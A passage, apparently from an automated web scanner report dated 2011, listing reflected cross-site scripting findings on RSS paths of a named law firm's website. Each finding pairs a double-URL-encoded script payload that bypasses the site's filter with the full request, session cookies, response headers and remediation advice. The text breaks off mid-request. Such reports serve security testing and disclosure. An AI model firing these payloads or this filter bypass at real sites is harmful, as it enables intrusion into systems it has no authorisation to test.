The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc00e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed760b3b5dd4 was submitted in the REST URL parameter 2. This input was echoed as cc00e"><script>alert(1)</script>d760b3b5dd4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/in_the_newscc00e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed760b3b5dd4/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6f54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2151516518f was submitted in the REST URL parameter 3. This input was echoed as b6f54"><script>alert(1)</script>2151516518f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/in_the_news/rss.xmlb6f54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2151516518f HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9abb7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d2f01cf3f9 was submitted in the REST URL parameter 1. This input was echoed as 9abb7"><script>alert(1)</script>3d2f01cf3f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss9abb7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d2f01cf3f9/news_releases/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc1d0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e98c2f7af3b5 was submitted in the REST URL parameter 2. This input was echoed as dc1d0"><script>alert(1)</script>98c2f7af3b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/news_releasesdc1d0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e98c2f7af3b5/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee81a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed27cf73a803 was submitted in the REST URL parameter 3. This input was echoed as ee81a"><script>alert(1)</script>d27cf73a803 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/news_releases/rss.xmlee81a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed27cf73a803 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32ca8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73f8dfaacf9 was submitted in the REST URL parameter 1. This input was echoed as 32ca8"><script>alert(1)</script>73f8dfaacf9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss32ca8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73f8dfaacf9/practices/Advertising/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5de32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebc55ccc6862 was submitted in the REST URL parameter 2. This input was echoed as 5de32"><script>alert(1)</script>bc55ccc6862 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices5de32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebc55ccc6862/Advertising/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80e2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09ca10697f5 was submitted in the REST URL parameter 3. This input was echoed as 80e2b"><script>alert(1)</script>09ca10697f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Advertising80e2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09ca10697f5/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ab1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6017d2c2dff was submitted in the REST URL parameter 4. This input was echoed as 86ab1"><script>alert(1)</script>6017d2c2dff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Advertising/rss.xml86ab1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6017d2c2dff HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Lan